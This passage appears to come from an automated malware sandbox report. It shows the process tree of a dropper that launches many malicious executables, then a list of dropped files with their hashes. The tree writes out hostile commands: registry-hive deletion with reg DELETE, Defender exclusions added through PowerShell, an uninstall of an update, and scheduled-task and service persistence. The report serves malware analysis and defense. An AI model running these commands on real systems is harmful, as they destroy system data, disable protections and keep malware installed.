                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3284
                                                                                                                                              • C:\Windows\System32\a\.exe
                                                                                                                                                "C:\Windows\System32\a\.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1640
                                                                                                                                              • C:\Windows\System32\a\diskutil.exe
                                                                                                                                                "C:\Windows\System32\a\diskutil.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:388
                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                  "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
                                                                                                                                                  3⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:1104
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:1440
                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                    "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
                                                                                                                                                    4⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:1628
                                                                                                                                              • C:\Windows\System32\a\systempreter.exe
                                                                                                                                                "C:\Windows\System32\a\systempreter.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:364
                                                                                                                                              • C:\Windows\System32\a\ghjaedjgaw.exe
                                                                                                                                                "C:\Windows\System32\a\ghjaedjgaw.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:5032
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\System32\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\IEUKNGLFCBIM" & exit
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:4440
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    timeout /t 10
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:2832
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp2_4363463463464363463463463.zip\4363463463464363463463463.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Temp2_4363463463464363463463463.zip\4363463463464363463463463.exe"
                                                                                                                                              1⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:1744
                                                                                                                                              • C:\Windows\SysWOW64\Files\Windows.exe
                                                                                                                                                "C:\Windows\System32\Files\Windows.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4196
                                                                                                                                              • C:\Windows\SysWOW64\Files\CritScript.exe
                                                                                                                                                "C:\Windows\System32\Files\CritScript.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4436
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:1416
                                                                                                                                              • C:\Windows\SysWOW64\Files\svhost.exe
                                                                                                                                                "C:\Windows\System32\Files\svhost.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4156
                                                                                                                                              • C:\Windows\SysWOW64\Files\ChatLife.exe
                                                                                                                                                "C:\Windows\System32\Files\ChatLife.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1772
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2296
                                                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                    tasklist
                                                                                                                                                    4⤵
                                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                                    PID:3608
                                                                                                                                              • C:\Windows\SysWOW64\Files\build.exe
                                                                                                                                                "C:\Windows\System32\Files\build.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5976
                                                                                                                                              • C:\Windows\SysWOW64\Files\gjawedrtg.exe
                                                                                                                                                "C:\Windows\System32\Files\gjawedrtg.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:4524
                                                                                                                                              • C:\Windows\SysWOW64\Files\hell9o.exe
                                                                                                                                                "C:\Windows\System32\Files\hell9o.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                PID:5376
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\regdel.CMD
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3904
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg DELETE HKEY_CLASSES_ROOT /f
                                                                                                                                                      4⤵
                                                                                                                                                      • Modifies system executable filetype association
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:5656
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg DELETE HKEY_CURRENT_USER /f
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2172
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg DELETE HKEY_LOCAL_MACHINE /f
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5888
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg DELETE HKEY_USERS /f
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4008
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg DELETE HKEY_CURRENT_CONFIG /f
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5624
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\regdel.CMD
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5060
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1304 -ip 1304
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4224
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3124
                                                                                                                                                            • C:\Windows\system32\OpenWith.exe
                                                                                                                                                              C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:1656
                                                                                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ZOMBIES.AHK
                                                                                                                                                                2⤵
                                                                                                                                                                • Opens file in notepad (likely ransom note)
                                                                                                                                                                PID:1364
                                                                                                                                                            • C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                                              C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:2036
                                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                2⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                PID:4528
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5288
                                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3644
                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                    C:\Windows\system32\conhost.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5200
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:5508
                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                        C:\Windows\System32\sc.exe delete "KOPWGCIF"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:1424
                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                        C:\Windows\System32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:5928
                                                                                                                                                                      • C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                                                        "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5672
                                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:3832
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5744
                                                                                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:2624
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe delete "KOPWGCIF"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:2424
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:4220
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:2676
                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                              C:\Windows\System32\sc.exe delete "KOPWGCIF"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:920
                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                              C:\Windows\System32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1992
                                                                                                                                                                            • C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
                                                                                                                                                                              "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1576
                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5256
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6020
                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6024
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe delete "KOPWGCIF"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:1084
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:5652
                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                  conhost.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1076

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\H63zRQfe\77iYF1Hwa.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  275KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  0a7b3454fdad8431bd3523648c915665

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  800a97a7c1a92a92cac76afc1fe5349895ee5287

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  baf217d7bb8f3a86856def6891638318a94ed5d7082149d4dd4cb755d90d86ce

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  020e45eaeee083d6739155d9a821ab54dd07f1320b8efb73871ee5d29188122fdbb7d39b34a8b3694a8b0c08ae1801ec370e40ff8d837c9190a72905f26baff9

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4e5628178e6aa02f5b40ea1542b5e312

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  80a81788cd2f51ac263e7971dffd48facf6cf8e0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5e350c36565072001847107ae374ecfa207f370f1997876904b50f8132e4be94

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3f74b575f8dc5e972d8ddfd03db3ff6a7d7d5fcbad3b49fda0a89c94a0c5ba62b51650ee1c603536fa509d2a1e816946a8454f9a566a41d0b13257184a5ac86d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d751713988987e9331980363e24189ce

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  524B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  613fc1d57a6fc484804e6855c8c5ccd2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  49aebb012f970145167ad5165b2ad085b7496dfd

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d16a74a6b159b5f02623184a9a3ed56508b33ee4a4a9d259cdeb85492ec9426c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b978937fab7830593f86122edc4645ff07126a22d6656bc97f015cae5cce679faed9666f011df0eb4e99663c993ad1692f785b155c43a95e23714f4fbbe1d474

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b14390043e4601ffbbe4a2b3b03022a9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  bc5924adab227165ce4399cb6ebacb656fd29259

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0d06ab4315d5b88c0d23ff98a4ba252743a433fc4cfc0a5591d234ff0d36009e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f5d55ac0868d833b436b14208b9d2f6f638659774916002cb0a6951cad315c1a88160c84d649d750e2ad7c750d63c667253cfc75afb6d17a7f44bdf24ca57c57

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  116KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  87efc71ee232f793aa93a3491f3074eb

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  dfdbb7dc45c04ef413df60d50eb8c6f36f756175

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0804d304c9d9cc5dc4d7d2c1160ce8238cc2cf8655c6c9b67c06c66d4095d899

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  aa3c66e9fe025f711e05fde0ddb23eee626213b0cc493c32b78964b431f4f3933da10abf42e055bfe9c0bbcadfe32d6ee089f570e33117e2c14fc6b54759885b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\diskutil.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  baf55b95da4a601229647f25dad12878

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  abc16954ebfd213733c4493fc1910164d825cac8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\831C.tmp\831D.tmp\832D.bat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  391B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  37b1b79bd305ad40763f735f6bdc5492

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3dbcd6540a68974280c4f24abf80a3519e6797ed

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  72572317f1b18b3348c3cf7de977b8742b0b47fd79b92576d7e4787b588fa08b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c674031ca54187111a004017286429aeeeb0df104f659f60d1b251269927f4309cbb1cb5d466d2f5909436ab02206c13071031ae822696b92ed96059529311e3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9329.tmp\932A.tmp\933B.bat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  46B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1b4e67ccd28b70ef7e83bd18803722c3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fa63275147f9e4ad22bd6f3737a5bcc8253e9411

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2524c6dd306b590c364e03faa37f924f90bbc0b13db426976e3159af86f13f19

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e8b7ed56ee207da397e93d4c8d97ff60ab35f6cb7c22e72b75c39f7e28b035edd85ad9c5fcfd3a3cd688e69caecbe0451e2abb64be7220d54b41e0ac6e95df84

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Built.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.9MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b9a0cf1020dcdb5626c3360003456ab0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d21946d5f6b448659c65f17eeae504ef1cae32d3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  396dcfdfa4b2bc2f01f2e0d68f31eb0713b3912ed36f4c3d39fcb3156a62fbfa

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  bc2d9dfe8278fab426f2aca3f5f9a89c1295558365cbe2ef54728d40ff8910e1893aa274d9c85eb1c6f134f7bec27842d61f27b0192ca990946e8c3caa5149a7

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Confirmed.cmd

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  21KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  aa910cf1271e6246b52da805e238d42e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1672b2eeb366112457b545b305babeec0c383c40

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f6aeee7fbc6ce536eef6d44e25edf441678d01317d0153dd3bda808c8c0fd25c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f012780499c4a0f4bf2a7213976f66ec1769cf611d133f07204c2041b9d6804875b50e37e42feb51073868d5de503e35abbef4682c3191ae0a7b65ff14a64a07

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.1MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bd4dcbdfdb5fdc1f95bd1168f166153a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  9db60cf0f8a8b88d3c4601df25963536aaeb1884

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  26ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ZOMBIES.AHK

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4378ec2852917fed7f557291e72251a6

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  104b3e944a713760b1fe491679ff3aa0af32298b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2ba38af1ffa558f31af78ae94c3369d92366838d5cb1e5c01c58369bc92ac914

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  162541d9cf8facddc824e65c0a9eb5760c95bf011ad69fdbd79890d9b44324b7e25cc3011ef2a9d0bdd351122148b8e5e9e627eb754f5383dd64bd35bd84db56

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI47362\VCRUNTIME140.dll

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  96KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f12681a472b9dd04a812e16096514974

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI47362\_ctypes.pyd

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  57KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  38fb83bd4febed211bd25e19e1cae555

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4541df6b69d0d52687edb12a878ae2cd44f82db6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI47362\base_library.zip

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.4MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2a138e2ee499d3ba2fc4afaef93b7caa

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  508c733341845e94fce7c24b901fc683108df2a8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  130e506ead01b91b60d6d56072c468aeb5457dd0f2ecd6ce17dfcbb7d51a1f8c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  1f61a0fda5676e8ed8d10dfee78267f6d785f9c131f5caf2dd984e18ca9e5866b7658ab7edb2ffd74920a40ffea5cd55c0419f5e9ee57a043105e729e10d820b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI47362\python311.dll

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.6MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bb46b85029b543b70276ad8e4c238799

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5e993617509c1cf434938d6a467eb0494e04580ad242535a04937f7c174d429da70a6e71792fc3de69e103ffc5d9de51d29001a4df528cfffefdaa2cef4eaf31

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1m54s1rh.g3h.ps1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  60B

                                                                                                                                                                                  MD5

